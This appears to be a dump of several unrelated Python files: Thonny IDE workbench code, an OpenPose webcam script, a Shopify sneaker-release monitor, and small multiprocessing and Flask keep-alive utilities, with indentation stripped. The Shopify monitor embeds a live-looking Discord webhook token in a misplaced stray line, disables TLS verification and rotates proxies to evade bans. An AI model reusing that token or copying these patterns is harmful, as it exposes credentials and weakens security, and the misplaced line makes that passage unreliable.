"BoldItalicIOFont",
]:
tk_font.nametofont(io_name).configure(family=io_font_family, size=io_font_size)
try:
shell = self.get_view("ShellView", create=False)
except Exception:
# shell may be not created yet
pass
else:
shell.update_tabs()
tk_font.nametofont("EditorFont").configure(family=editor_font_family, size=editor_font_size)
tk_font.nametofont("SmallEditorFont").configure(
family=editor_font_family, size=editor_font_size - 2
)
tk_font.nametofont("BoldEditorFont").configure(
family=editor_font_family, size=editor_font_size
)
tk_font.nametofont("ItalicEditorFont").configure(
family=editor_font_family, size=editor_font_size
)
tk_font.nametofont("BoldItalicEditorFont").configure(
family=editor_font_family, size=editor_font_size
)
if self.get_ui_mode() == "simple":
default_size_factor = max(0.7, 1 - (editor_font_size - 10) / 25)
small_size_factor = max(0.6, 0.8 - (editor_font_size - 10) / 25)
tk_font.nametofont("TkDefaultFont").configure(
size=round(editor_font_size * default_size_factor)
)
tk_font.nametofont("TkHeadingFont").configure(
size=round(editor_font_size * default_size_factor)
)
tk_font.nametofont("SmallLinkFont").configure(
size=round(editor_font_size * small_size_factor)
)
# Update Treeview font and row height
if running_on_mac_os():
treeview_font_size = int(editor_font_size * 0.7 + 4)
else:
treeview_font_size = int(editor_font_size * 0.7 + 2)
treeview_font = tk_font.nametofont("TreeviewFont")
treeview_font.configure(size=treeview_font_size)
rowheight = round(treeview_font.metrics("linespace") * 1.2)
style = ttk.Style()
style.configure("Treeview", rowheight=rowheight)
if self._editor_notebook is not None:
self._editor_notebook.update_appearance()
def _get_menu_index(self, menu: tk.Menu) -> int:
for i in range(len(self._menubar.winfo_children())):
if menu == self._menubar.winfo_children()[i]:
return i
raise RuntimeError("Couldn't find menu")
def _add_toolbar_button(
self,
command_id: str,
image: Optional[tk.PhotoImage],
command_label: str,
caption: str,
alternative_caption: str,
accelerator: Optional[str],
handler: Callable[[], None],
tester: Optional[Callable[[], bool]],
toolbar_group: int,
) -> None:
assert caption is not None and len(caption) > 0, (
"Missing caption for '%s'. Toolbar commands must have caption." % command_label
)
slaves = self._toolbar.grid_slaves(0, toolbar_group)
if len(slaves) == 0:
group_frame = ttk.Frame(self._toolbar)
if self.in_simple_mode():
padx = 0 # type: Union[int, Tuple[int, int]]
else:
padx = (0, 10)
group_frame.grid(row=0, column=toolbar_group, padx=padx)
else:
group_frame = slaves[0]
if self.in_simple_mode():
screen_width = self.winfo_screenwidth()
if screen_width >= 1280:
button_width = max(7, len(caption), len(alternative_caption))
elif screen_width >= 1024:
button_width = max(6, len(caption), len(alternative_caption))
else:
button_width = max(5, len(caption), len(alternative_caption))
else:
button_width = None
button = ttk.Button(
group_frame,
command=handler,
image=image,
style="Toolbutton",
state=tk.NORMAL,
text=caption,
compound="top" if self.in_simple_mode() else None,
pad=(10, 0) if self.in_simple_mode() else None,
width=button_width,
)
button.pack(side=tk.LEFT)
button.tester = tester # type: ignore
tooltip_text = command_label
if self.get_ui_mode() != "simple":
if accelerator and lookup_style_option(
"OPTIONS", "shortcuts_in_tooltips", default=True
):
tooltip_text += " (" + accelerator + ")"
create_tooltip(button, tooltip_text)
self._toolbar_buttons[command_id] = button
def get_toolbar_button(self, command_id):
return self._toolbar_buttons[command_id]
def _update_toolbar(self) -> None:
if self._destroyed or not hasattr(self, "_toolbar"):
return
if self._toolbar.winfo_ismapped():
for group_frame in self._toolbar.grid_slaves(0):
for button in group_frame.pack_slaves():
if thonny._runner is None or button.tester and not button.tester():
button["state"] = tk.DISABLED
else:
button["state"] = tk.NORMAL
def _cmd_zoom_with_mouse(self, event) -> None:
if event.delta > 0:
self._change_font_size(1)
else:
self._change_font_size(-1)
def _toggle_font_size(self) -> None:
current_size = self.get_option("view.editor_font_size")
if self.winfo_screenwidth() < 1024:
# assuming 32x32 icons
small_size = 10
medium_size = 12
large_size = 14
elif self.winfo_screenwidth() < 1280:
# assuming 32x32 icons
small_size = 12
medium_size = 14
large_size = 18
else:
small_size = 12
medium_size = 16
large_size = 20
widths = {10: 800, 12: 1050, 14: 1200, 16: 1300, 18: 1400, 20: 1650}
if current_size < small_size or current_size >= large_size:
new_size = small_size
elif current_size < medium_size:
new_size = medium_size
else:
new_size = large_size
self._change_font_size(new_size - current_size)
new_width = min(widths[new_size], self.winfo_screenwidth())
geo = re.findall(r"\d+", self.wm_geometry())
self.geometry("{0}x{1}+{2}+{3}".format(new_width, geo[1], geo[2], geo[3]))
def _change_font_size(self, delta: int) -> None:
if delta != 0:
editor_font_size = self.get_option("view.editor_font_size")
editor_font_size += delta
self.set_option("view.editor_font_size", self._guard_font_size(editor_font_size))
io_font_size = self.get_option("view.io_font_size")
io_font_size += delta
self.set_option("view.io_font_size", self._guard_font_size(io_font_size))
self.update_fonts()
def _guard_font_size(self, size: int) -> int:
# https://bitbucket.org/plas/thonny/issues/164/negative-font-size-crashes-thonny
MIN_SIZE = 4
MAX_SIZE = 200
if size < MIN_SIZE:
return MIN_SIZE
elif size > MAX_SIZE:
return MAX_SIZE
else:
return size
def _check_update_window_width(self, delta: int) -> None:
if not ui_utils.get_zoomed(self):
self.update_idletasks()
# TODO: shift to left if right edge goes away from screen
# TODO: check with screen width
new_geometry = "{0}x{1}+{2}+{3}".format(
self.winfo_width() + delta, self.winfo_height(), self.winfo_x(), self.winfo_y()
)
self.geometry(new_geometry)
def _maximize_view(self, event=None) -> None:
if self._maximized_view is not None:
return
# find the widget that can be relocated
widget = self.focus_get()
if isinstance(widget, (EditorNotebook, AutomaticNotebook)):
current_tab = widget.get_current_child()
if current_tab is None:
return
if not hasattr(current_tab, "maximizable_widget"):
return
widget = current_tab.maximizable_widget
while widget is not None:
if hasattr(widget, "home_widget"):
# if widget is view, then widget.master is workbench
widget.grid(
row=1, column=0, sticky=tk.NSEW, in_=widget.master # type: ignore
)
# hide main_frame
self._main_frame.grid_forget()
self._maximized_view = widget
self.get_variable("view.maximize_view").set(True)
break
else:
widget = widget.master # type: ignore
def _unmaximize_view(self, event=None) -> None:
if self._maximized_view is None:
return
# restore main_frame
self._main_frame.grid(row=1, column=0, sticky=tk.NSEW, in_=self)
# put the maximized view back to its home_widget
self._maximized_view.grid(
row=0, column=0, sticky=tk.NSEW, in_=self._maximized_view.home_widget # type: ignore
)
self._maximized_view = None
self.get_variable("view.maximize_view").set(False)
def show_options(self, page_key=None):
dlg = ConfigurationDialog(self, self._configuration_pages)
if page_key:
dlg.select_page(page_key)
ui_utils.show_dialog(dlg)
def _cmd_focus_editor(self) -> None:
self.get_editor_notebook().focus_set()
def _cmd_focus_shell(self) -> None:
self.show_view("ShellView", True)
shell = get_shell()
# go to the end of any current input
shell.text.mark_set("insert", "end")
shell.text.see("insert")
def _cmd_toggle_full_screen(self) -> None:
"""
TODO: For mac
http://wiki.tcl.tk/44444
Switching a window to fullscreen mode
(Normal Difference)
To switch a window to fullscreen mode, the window must first be withdrawn.
# For Linux/Mac OS X:
set cfs [wm attributes $w -fullscreen]
if { $::tcl_platform(os) eq "Darwin" } {
if { $cfs == 0 } {
# optional: save the window geometry
set savevar [wm geometry $w]
}
wm withdraw $w
}
wm attributes $w -fullscreen [expr {1-$cfs}]
if { $::tcl_platform(os) eq "Darwin" } {
wm deiconify $w
if { $cfs == 1 } {
after idle [list wm geometry $w $savevar]
}
}
"""
var = self.get_variable("view.full_screen")
var.set(not var.get())
self.attributes("-fullscreen", var.get())
def _cmd_toggle_maximize_view(self) -> None:
if self._maximized_view is not None:
self._unmaximize_view()
else:
self._maximize_view()
def _update_menu(self, menu: tk.Menu, menu_name: str) -> None:
if menu.index("end") is None:
return
for i in range(menu.index("end") + 1):
item_data = menu.entryconfigure(i)
if "label" in item_data:
command_label = menu.entrycget(i, "label")
if (menu_name, command_label) not in self._menu_item_specs:
continue
tester = self._menu_item_specs[(menu_name, command_label)].tester
enabled = not tester
if tester:
try:
enabled = tester()
except Exception:
traceback.print_exc()
enabled = False
if enabled:
menu.entryconfigure(i, state=tk.NORMAL)
else:
menu.entryconfigure(i, state=tk.DISABLED)
def _find_location_for_menu_item(self, menu_name: str, command_label: str) -> Union[str, int]:
menu = self.get_menu(menu_name)
if menu.index("end") == None: # menu is empty
return "end"
specs = self._menu_item_specs[(menu_name, command_label)]
this_group_exists = False
for i in range(0, menu.index("end") + 1):
data = menu.entryconfigure(i)
if "label" in data:
# it's a command, not separator
sibling_label = menu.entrycget(i, "label")
sibling_group = self._menu_item_specs[(menu_name, sibling_label)].group
if sibling_group == specs.group:
this_group_exists = True
if specs.position_in_group == "alphabetic" and sibling_label > command_label:
return i
if sibling_group > specs.group:
assert (
not this_group_exists
) # otherwise we would have found the ending separator
menu.insert_separator(i)
return i
else:
# We found a separator
if this_group_exists:
# it must be the ending separator for this group
return i
# no group was bigger, ie. this should go to the end
if not this_group_exists:
menu.add_separator()
return "end"
def _poll_ipc_requests(self) -> None:
try:
if self._ipc_requests.empty():
return
while not self._ipc_requests.empty():
args = self._ipc_requests.get()
try:
for filename in args:
if os.path.isfile(filename):
self.get_editor_notebook().show_file(filename)
except Exception:
traceback.print_exc()
self.become_active_window()
finally:
self.after(50, self._poll_ipc_requests)
def _on_close(self) -> None:
if not self.get_editor_notebook().check_allow_closing():
return
self._closing = True
try:
self._save_layout()
self._editor_notebook.remember_open_files()
self.event_generate("WorkbenchClose")
self._configuration_manager.save()
except Exception:
self.report_exception()
self.destroy()
self._destroyed = True
def _on_all_key_presses(self, event):
if running_on_windows():
ui_utils.handle_mistreated_latin_shortcuts(self._latin_shortcuts, event)
def _on_focus_in(self, event):
if self._lost_focus:
self._lost_focus = False
self.event_generate("WindowFocusIn")
def _on_focus_out(self, event):
if self.focus_get() is None:
if not self._lost_focus:
self._lost_focus = True
self.event_generate("WindowFocusOut")
def focus_get(self) -> Optional[tk.Widget]:
try:
return tk.Tk.focus_get(self)
except Exception:
# This may give error in Ubuntu
return None
def destroy(self) -> None:
try:
if self._is_server() and os.path.exists(thonny.IPC_FILE):
os.remove(thonny.IPC_FILE)
self._closing = True
# Tk clipboard gets cleared on exit and won't end up in system clipboard
# https://bugs.python.org/issue1207592
# https://stackoverflow.com/questions/26321333/tkinter-in-python-3-4-on-windows-dont-post-internal-clipboard-data-to-the-windo
try:
clipboard_data = self.clipboard_get()
if len(clipboard_data) < 1000 and all(
map(os.path.exists, clipboard_data.splitlines())
):
# Looks like the clipboard contains file name(s)
# Most likely this means actual file cut/copy operation
# was made outside of Thonny.
# Don't want to replace this with simple string data of file names.
pass
else:
copy_to_clipboard(clipboard_data)
except Exception:
pass
except Exception:
logging.exception("Error while destroying workbench")
finally:
try:
super().destroy()
finally:
runner = get_runner()
if runner != None:
runner.destroy_backend()
def _on_configure(self, event) -> None:
# called when window is moved or resized
if (
hasattr(self, "_maximized_view") # configure may happen before the attribute is defined
and self._maximized_view # type: ignore
):
# grid again, otherwise it acts weird
self._maximized_view.grid(
row=1, column=0, sticky=tk.NSEW, in_=self._maximized_view.master # type: ignore
)
def _on_tk_exception(self, exc, val, tb) -> None:
# copied from tkinter.Tk.report_callback_exception with modifications
# see http://bugs.python.org/issue22384
sys.last_type = exc
sys.last_value = val
sys.last_traceback = tb
self.report_exception()
def report_exception(self, title: str = "Internal error") -> None:
logging.exception(title)
if tk._default_root and not self._closing: # type: ignore
(typ, value, _) = sys.exc_info()
assert typ is not None
if issubclass(typ, UserError):
msg = str(value)
else:
msg = traceback.format_exc()
dlg = ui_utils.LongTextDialog(title, msg, parent=self)
ui_utils.show_dialog(dlg, self)
def _open_views(self) -> None:
for nb_name in self._view_notebooks:
view_name = self.get_option("layout.notebook_" + nb_name + "_visible_view")
if view_name != None:
if view_name == "GlobalsView":
# was renamed in 2.2b5
view_name = "VariablesView"
if self.get_ui_mode() != "simple" or view_name in SIMPLE_MODE_VIEWS:
self.show_view(view_name)
# make sure VariablesView is at least loaded
# otherwise it may miss globals events
# and will show empty table on open
self.get_view("VariablesView")
if (
self.get_option("assistance.open_assistant_on_errors")
or self.get_option("assistance.open_assistant_on_warnings")
) and (self.get_ui_mode() != "simple" or "AssistantView" in SIMPLE_MODE_VIEWS):
self.get_view("AssistantView")
def _save_layout(self) -> None:
self.update_idletasks()
self.set_option("layout.zoomed", ui_utils.get_zoomed(self))
for nb_name in self._view_notebooks:
widget = self._view_notebooks[nb_name].get_visible_child()
if hasattr(widget, "maximizable_widget"):
view = widget.maximizable_widget
view_name = type(view).__name__
self.set_option("layout.notebook_" + nb_name + "_visible_view", view_name)
else:
self.set_option("layout.notebook_" + nb_name + "_visible_view", None)
if not ui_utils.get_zoomed(self) or running_on_mac_os():
# can't restore zoom on mac without setting actual dimensions
gparts = re.findall(r"\d+", self.wm_geometry())
self.set_option("layout.width", int(gparts[0]))
self.set_option("layout.height", int(gparts[1]))
self.set_option("layout.left", int(gparts[2]))
self.set_option("layout.top", int(gparts[3]))
self.set_option("layout.west_pw_width", self._west_pw.preferred_size_in_pw)
self.set_option("layout.east_pw_width", self._east_pw.preferred_size_in_pw)
for key in ["nw", "sw", "s", "se", "ne"]:
self.set_option(
"layout.%s_nb_height" % key, self._view_notebooks[key].preferred_size_in_pw
)
def update_title(self, event=None) -> None:
editor = self.get_editor_notebook().get_current_editor()
if self._is_portable:
title_text = "Portable Thonny"
else:
title_text = "Thonny"
if editor != None:
title_text += " - " + editor.get_long_description()
self.title(title_text)
def become_active_window(self, force=True) -> None:
# Looks like at least on Windows all following is required
# for ensuring the window gets focus
# (deiconify, ..., iconify, deiconify)
self.deiconify()
if force:
self.attributes("-topmost", True)
self.after_idle(self.attributes, "-topmost", False)
self.lift()
if not running_on_linux():
# http://stackoverflow.com/a/13867710/261181
self.iconify()
self.deiconify()
editor = self.get_editor_notebook().get_current_editor()
if editor is not None:
# This method is meant to be called when new file is opened, so it's safe to
# send the focus to the editor
editor.focus_set()
else:
self.focus_set()
def open_url(self, url):
m = re.match(r"^thonny-editor://(.*?)(#(\d+)(:(\d+))?)?$", url)
if m is not None:
filename = m.group(1).replace("%20", " ")
lineno = None if m.group(3) is None else int(m.group(3))
col_offset = None if m.group(5) is None else int(m.group(5))
if lineno is None:
self.get_editor_notebook().show_file(filename)
else:
self.get_editor_notebook().show_file_at_line(filename, lineno, col_offset)
return
m = re.match(r"^thonny-help://(.*?)(#(.+))?$", url)
if m is not None:
topic = m.group(1)
fragment = m.group(3)
self.show_view("HelpView").load_topic(topic, fragment)
return
if url.endswith(".rst") and not url.startswith("http"):
parts = url.split("#", maxsplit=1)
topic = parts[0][:-4]
if len(parts) == 2:
fragment = parts[1]
else:
fragment = None
self.show_view("HelpView").load_topic(topic, fragment)
return
# Fallback
webbrowser.open(url, False, True)
def open_help_topic(self, topic, fragment=None):
self.show_view("HelpView").load_topic(topic, fragment)
def bell(self, displayof=0):
if not self.get_option("general.disable_notification_sound"):
super().bell(displayof=displayof)
def _mac_quit(self, *args):
self._on_close()
def _is_server(self):
return self._ipc_requests is not None
def get_toolbar(self):
return self._toolbar
class WorkbenchEvent(Record):
def __init__(self, sequence: str, **kwargs) -> None:
Record.__init__(self, **kwargs)
self.sequence = sequence
|
Pose.py
|
# op class,调用openpose用于分析每一帧图像,获得图像身体节点坐标
import sys
import cv2
import os
from sys import platform
import argparse
#from tello import *
from UI import FPS, RollingGraph
from math import atan2, degrees, sqrt, pi
import numpy as np
import time
import gc
from multiprocessing import Process, Manager
#import profile
import random
# 导入openpos库
dir_path = os.path.dirname(os.path.realpath(__file__))
try:
if platform == "win32":
# 对于windows系统导入dll库
sys.path.append(dir_path+'./../python/openpose/Release') # 路径根据文件所在位置
os.environ['path'] = os.environ['path'] + ';' + \
dir_path + './../x64/Release;' + dir_path + './../bin;'
# 上面路径需要根据openpose文件夹的位置来决定
import pyopenpose as op
else:
# 不是windows系统则使用python文件夹里的pyd
sys.path.append('../python')
from openpose import pyopenpose as op
except ImportError as e:
print('Error: OpenPose library could not be found. Did you enable `BUILD_PYTHON` in CMake and have this Python script in the right folder?')
raise e
def angle(A, B, C):
if A[0] is None or B[0] is None or C[0] is None:
return None
dg = degrees(atan2(C[1]-B[1], C[0]-B[0]) -
atan2(A[1]-B[1], A[0]-B[0])) % 360
if dg >= 180 and dg < 360:
dg = 360-dg
return dg
class Pose:
def __init__(self):
parser = argparse.ArgumentParser()
#parser.add_argument("--image_path", default="./media/COCO_val2014_000000000192.jpg", help="Process an image. Read all standard formats (jpg, png, bmp, etc.).")
args = parser.parse_known_args()
params = dict()
params["model_folder"] = './../models/' # 具体情况
params["number_people_max"] = 1
params["model_pose"] = "BODY_25"
# Add others in path?
for i in range(0, len(args[1])):
curr_item = args[1][i]
if i != len(args[1])-1:
next_item = args[1][i+1]
else:
next_item = "1"
if "--" in curr_item and "--" in next_item:
key = curr_item.replace('-', '')
if key not in params:
params[key] = "1"
elif "--" in curr_item and "--" not in next_item:
key = curr_item.replace('-', '')
if key not in params:
params[key] = next_item
# 初始化openpose
self.opWrapper = op.WrapperPython()
self.opWrapper.configure(params)
self.opWrapper.start()
self.datum = op.Datum()
def get_kp(self, frame): # 返回坐标点的方法返回的是二维数组
self.datum.cvInputData = frame
self.opWrapper.emplaceAndPop([self.datum])
out = self.datum.cvOutputData # 直接将画好的传出不需要再用cv2画一次
xy = [[0, 0], [0, 0], [0, 0], [0, 0], [0, 0], [0, 0], [0, 0], [0, 0], [0, 0], [
0, 0], [0, 0], [0, 0], [0, 0], [0, 0], [0, 0], [0, 0], [0, 0], [0, 0], [0, 0]]
# 添加一组获取图片亮度listid[10]
brightness = self.framebightness(frame)
try:
kps = self.datum.poseKeypoints[0]
# out=self.datum.cvOutputData
listid = [0, 1, 2, 3, 4, 5, 6, 7, 8, 10,
15, 16, 17, 18] # body_25模型关键点,10为亮度
#
for i in listid:
x, y, conf = kps[i]
if x != 0 or y != 0: # 允许一个为0,不允许都为0
xy[i][0] = int(x)
xy[i][1] = int(y)
else:
xy[i][0] = xy[i][1] = None
if i == 10:
xy[i][0] = xy[i][1] = brightness
except:
for i in range(19):
if i == 10:
xy[i][0] = xy[i][1] = brightness
else:
xy[i][0] = xy[i][1] = None
return xy, out # xy[i][k]i代表第几个点k代表第几个坐标
def framebightness(self, frame): # 获取图片亮度,返回按压
frame = cv2.cvtColor(frame, cv2.COLOR_BGR2GRAY) # 灰度图
per_image = []
per_image.append(np.mean(frame[0]))
brightness = np.mean(per_image)
if brightness < 15: # 调敏感度太高了容易emmmmm割到手
press = 1
else:
press = 0
return press
def write(stack, imge) -> None:
top = 20
stack.append(imge)
if len(stack) >= top:
del stack[:]
gc.collect()
def read(stack) -> None:
fourcc = cv2.VideoWriter_fourcc(*'avc1')
out = cv2.VideoWriter('video_out'+str(time.time()) +
'.mp4', fourcc, 25, (640, 480))
while 1:
if len(stack) >= 10:
frame = stack.pop()
out.write(frame)
cv2.imshow("REC", frame)
key = cv2.waitKey(1) & 0xFF
if key == ord('c'):
break
else:
continue
out.release()
cv2.destroyAllWindows()
def runtest():
video = cv2.VideoCapture(0)
ispose = 1
isrec = 0
fps = FPS()
if ispose:
my_pose = Pose()
if isrec:
stack = Manager().list()
pr = Process(target=read, args=(stack,))
pr.start()
lspoint = []
roll = RollingGraph(thickness=[1], threshold=125, waitKey=False)
while True:
start_time = time.time()
ok, frame = video.read()
if not ok:
break
fps.update()
# frame=cv2.imread("./123.jpg")
frame2 = frame
# cv2.imshow("raw",frame)
if ispose:
show, out = my_pose.get_kp(frame)
# print(show[7])
# angle234=angle((show[2][0],show[2][1]),(show[3][0],show[3][1]),(show[4][0],show[4][1]))
# angle567=angle((show[7][0],show[7][1]),(show[6][0],show[6][1]),(show[5][0],show[5][1]))
# #if angle567:
# #print(str(angle234)+' '+str(angle567)+' '+str(show[10][0]))
# #else:
# # print('ooooops')
if show[2][0]: # 值判断一个就好
cv2.circle(out, (show[2][0], show[2][1]), 10, (0, 0, 255), -1)
if show[3][0]:
cv2.circle(out, (show[3][0], show[3][1]), 10, (0, 0, 255), -1)
if show[4][0]:
cv2.circle(out, (show[4][0], show[4][1]), 10, (0, 0, 255), -1)
if show[5][0]: # 值判断一个就好
cv2.circle(out, (show[5][0], show[5][1]), 10, (0, 0, 255), -1)
if show[6][0]:
cv2.circle(out, (show[6][0], show[6][1]), 10, (0, 0, 255), -1)
if show[7][0]:
cv2.circle(out, (show[7][0], show[7][1]), 10, (0, 0, 255), -1)
# if show[15][0] and show[15][1]:
# #cv2.circle(frame2, (show[0][0], show[0][1]), 35, (0, 0, 255), -1)
# if len(lspoint)>=30:
# lspoint.pop(0)
# lspoint.append([show[15][0],show[15][1]])
# for item in lspoint:
# coloris=(random.randint(0,255),random.randint(0,255),random.randint(0,255))
# #coloris=(255,255,255)
# cv2.circle(frame2,(item[0],item[1]),5,coloris,-1)
# if show[16][0] and show[16][1]:
# #cv2.circle(frame2, (show[0][0], show[0][1]), 35, (0, 0, 255), -1)
# if len(lspoint)>=30:
# lspoint.pop(0)
# lspoint.append([show[16][0],show[16][1]])
# for item in lspoint:
# coloris=(random.randint(0,255),random.randint(0,255),random.randint(0,255))
# #coloris=(255,255,255)
# cv2.circle(frame2,(item[0],item[1]),5,coloris,-1)
if show[0][0]:
cv2.circle(out, (320, 240), 20, (0, 0, 255), -1)
if len(lspoint) >= 30:
lspoint.pop(0)
lspoint.append([show[0][0], show[0][1]])
for item in lspoint:
# coloris=(random.randint(0,255),random.randint(0,255),random.randint(0,255))
coloris = (255, 255, 255)
cv2.circle(out, (item[0], item[1]), 5, coloris, -1)
roll.new_iter([show[0][0]-320+125])
#cv2.putText(frame2, 'love you', (show[0]-70,show[1]), cv2.FONT_HERSHEY_COMPLEX, 1, (0, 0, 255), 2)
fps.display(out)
if isrec:
write(stack, out)
out = cv2.resize(out, (960, 720))
cv2.imshow("raw", out)
# cv2.imshow("1",show[2])
# print(show[0][0],show[0][1])
# print('ok')
k = cv2.waitKey(1) & 0xff
if k == 27:
break
video.release()
# pr.terminate()
cv2.destroyAllWindows()
# 读取摄像头测试
if __name__ == '__main__':
# profile.run("run()")
runtest()
|
shopify-sites.py
|
'''
NERYS
a universal product monitor
Current Module: Shopify Sites
Usage:
NERYS will monitor specified sites for keywords and sends a Discord alert
when a page has a specified keyword. This can be used to monitor any site
on a product release date to automatically detect when a product has been
uploaded. Useful when monitoring hundreds of sites for shops in different
timezones.
Complete:
- find all products on Shopify site by keyword
- send discord notifications
- monitor for new products
- optimization for Shopify to return product checkout links by size
- find all products on other sites by keyword
- attempt to get product page links for universal sites
Left To Do:
- monitor for Shopify restocks
- monitor for restocks on other sites
-- find sold out by keyword
-- find sizes by keyword
-- find countdown timer by keyword
- detect cloudflare
- get product picture for other sites
- optimization for footsites
Credits:
Niveen Jegatheeswaran - Main Dev - https://github.com/snivyn/
kyb3r - Discord Embed - https://github.com/kyb3r/
'''
import requests
from log import log as log
import time
from threading import Thread
from datetime import datetime
import random
import json
import sqlite3
from bs4 import BeautifulSoup as soup
from discord_hooks import Webhook
from multiprocessing import Process
class FileNotFound(Exception):
''' Raised when a file required for the program to operate is missing. '''
class NoDataLoaded(Exception):
''' Raised when the file is empty. '''
class OutOfProxies(Exception):
''' Raised when there are no proxies left '''
def read_from_txt(path):
'''
(None) -> list of str
Loads up all sites from the sitelist.txt file in the root directory.
Returns the sites as a list
'''
# Initialize variables
raw_lines = []
lines = []
# Load data from the txt file
try:
f = open(path, "r")
raw_lines = f.readlines()
f.close()
# Raise an error if the file couldn't be found
except:
log('e', "Couldn't locate <" + path + ">.")
raise FileNotFound()
if(len(raw_lines) == 0):
raise NoDataLoaded()
# Parse the data
for line in raw_lines:
lines.append(line.strip("\n"))
# Return the data
return lines
def send_embed(alert_type, link, fields, site, image, product):
'''
(str, str, list, str, str, str) -> None
Sends a discord alert based on info provided.
'''
url = webhook
embed = Webhook(url, color=123123)
if(alert_type == "NEW_SHOPIFY"):
desc = "NEW: " + product
elif(alert_type == "RESTOCK_SHOPIFY"):
desc = "RESTOCK: " + product
embed.set_author(name='NERYS', icon='https://static.zerochan.net/Daenerys.Targaryen.full.2190849.jpg')
embed.set_desc(desc)
for field in fields:
if(alert_type == "NEW_SHOPIFY" or alert_type == "RESTOCK_SHOPIFY"):
cart_link = site + "/cart/" + str(field[1]) + ":1"
embed.add_field(name=str(field[0]), value=cart_link)
if(image is not None):
embed.set_thumbnail(image)
embed.set_image(image)
embed.set_footer(text='NERYS by @snivynGOD', icon='https://static.zerochan.net/Daenerys.Targaryen.full.2190849.jpg', ts=True)
embed.post()
def get_proxy(proxy_list):
'''
(list) -> dict
Given a proxy list <proxy_list>, a proxy is selected and returned.
'''
# Choose a random proxy
proxy = random.choice(proxy_list)
# Set up the proxy to be used
proxies = {
"http": str(proxy),
"https": str(proxy)
}
# Return the proxy
return proxies
def update_shopify_db(keywords, site, proxy_list):
while(True):
log('i', "Monitoring site <" + site + ">.")
# Create link to monitor (Kith is a special case)
if("kith.com" in site):
link = "https://kith.com/collections/footwear.atom"
else:
link = site + "/collections/all/products.atom"
working = False
# Get a proxy
proxies = get_proxy(proxy_list)
# Get the products on the site
try:
r = requests.get(link, proxies=proxies, timeout=3, verify=False)
except:
try:
proxies = get_proxy(proxy_list)
r = requests.get(link, proxies=proxies, timeout=5, verify=False)
except:
log('e', "Connection to URL <" + link + "> failed.")
continue
xml = soup(r.text, "xml")
products_raw = xml.findAll('entry')
# Get products with the specified keywords
for product in products_raw:
product_found = False
for keyword in keywords:
if(not product_found):
# Get the product info
title = product.find("title").text
link = product.find("link")["href"]
tags_raw = product.findAll("s:tag")
tags = []
for tag in tags_raw:
tags.append(tag.text.upper())
# Check if the keywords are in the product's name or tags
if(keyword.upper() in title.upper() or keyword.upper() in tags):
# Get the variants from the product
try:
r = requests.get(link + ".xml", proxies=proxies, timeout=3, verify=False)
working = True
except:
# Get a new proxy
proxies = get_proxy(proxy_list)
# Try again with a new proxy
try:
r = requests.get(link + ".xml", proxies=proxies, timeout=5, verify=False)
working = True
except:
working = False
# If the site/proxy is working
if(working):'https://discordapp.com/api/webhooks/539724977209999370/WhJDAUZX1AqV6WagfJ8PEVIV9FiLjpYrh2zIP6eLu8794S4QF3etmqE22JBVQsn3auPl'
# Break down the product page
xml = soup(r.text, "xml")
# Get the variants for the product
variants = []
raw_variants = xml.findAll("variant")
for raw_variant in raw_variants:
variants.append((raw_variant.find("title").text, raw_variant.find("id").text))
# Get the product's image if it's available
try:
image = xml.find("image").find("src").text
except:
image = None
# Store the product in the database
product_info = (title, link, variants, image, title, site)
alert = add_to_shopify_db(product_info)
product_found = True
# Send a Discord alert if the product is new
if(alert):
send_embed("NEW_SHOPIFY", link, variants, site, image, title)
# Wait the specified timeframe before checking the site again
time.sleep(delay)
def add_to_shopify_db(product):
# Initialize variables
title = product[0]
link = product[1]
stock = str(product[2])
alert = False
# Create database
conn = sqlite3.connect('products.db')
c = conn.cursor()
c.execute("""CREATE TABLE IF NOT EXISTS products_shopify(link TEXT UNIQUE, product TEXT, stock TEXT)""")
# Add product to database if it's unique
try:
c.execute("""INSERT INTO products_shopify (link, product, stock) VALUES (?, ?, ?)""", (link, title, stock))
log('s', "Found new product <" + title + ">.")
alert = True
except:
log('i', "Product <" + title + "> already exists in the database.")
# Close database
conn.commit()
c.close()
conn.close()
# Return whether or not it's a new product
return alert
''' --------------------------------- RUN --------------------------------- '''
if(__name__ == "__main__"):
# Ignore insecure messages
requests.packages.urllib3.disable_warnings()
# Initialize settings
keywords = [
"bred toe",
"gold toe",
"pharrell",
"holi",
"free throw line",
"kendrick",
"tinker",
"game royal",
"yeezy",
"human race",
"big bang",
"dont trip",
"don't trip",
"kung fu kenny",
"playstation",
"ovo air jordan",
"ovo jordan",
"wotherspoon",
"nike x off-white",
"off-white x nike",
"air jordan 1",
"wave runner",
"katrina",
"animal pack",
"acronym",
"vf sw",
"the ten",
"the 10"
]
webhook = "" # Put your webhook link here
delay = 5 # Lots of sites + few proxies = longer delay to avoid bans
# Load proxies
proxies = read_from_txt("proxies.txt")
log('i', str(len(proxies)) + " proxies loaded.")
# Store sites from txt files
shopify_sites = read_from_txt("shopify-sites.txt")
total_sites = len(shopify_sites)
log('i', str(total_sites) + " sites loaded.")
# Loop through each Shopify site
for site in shopify_sites:
# Monitor for new products
t = Thread(target=update_shopify_db, args=(keywords, site, proxies))
t.start()
time.sleep(1)
|
logic_batch.py
|
"""Analytic
"""
import multiprocessing as mp
import logic_generator as lg
from tqdm import tqdm
def get_totalCores():
"""Get the total numbers of cores."""
print("Number of Cores:", mp.cpu_count())
def generator_func(items=1):
"""Reference function for multiprocessing.
Parameters
----------
items : int
Number of items in the logic table.
"""
lg.LogicGenerator(items).generator()
def batch_run(n_items):
"""Run a batch of logic generators.
Parameters
----------
n_items : list
Number of items in the truth table.
"""
procs = []
# instantiating without any argument
proc = mp.Process(target=generator_func) # instantiating without any argument
procs.append(proc)
proc.start()
# instantiating process with arguments
for c_item in n_items:
# print(name)
proc = mp.Process(target=generator_func, args=(c_item,))
procs.append(proc)
proc.start()
# complete the processes
for proc in tqdm(procs):
proc.join()
if __name__ == "__main__":
get_totalCores()
batch_run(n_items=[2, 3, 4, 5, 6, 7, 8, 9, 10])
|
keep_alive.py
|
from threading import Thread
from flask import Flask
app = Flask('')
@app.route('/')
def home():
return "I'm keeping alive"
def run():
app.run(host='0.0.0.0', port=8080)
def keep_alive():
t = Thread(target=run)
t.start()
|
context.py
|
#
# Licensed to the Apache Software Foundation (ASF) under one or more
# contributor license agreements. See the NOTICE file distributed with
# this work for additional information regarding copyright ownership.
# The ASF licenses this file to You under the Apache License, Version 2.0
# (the "License"); you may not use this file except in compliance with
# the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
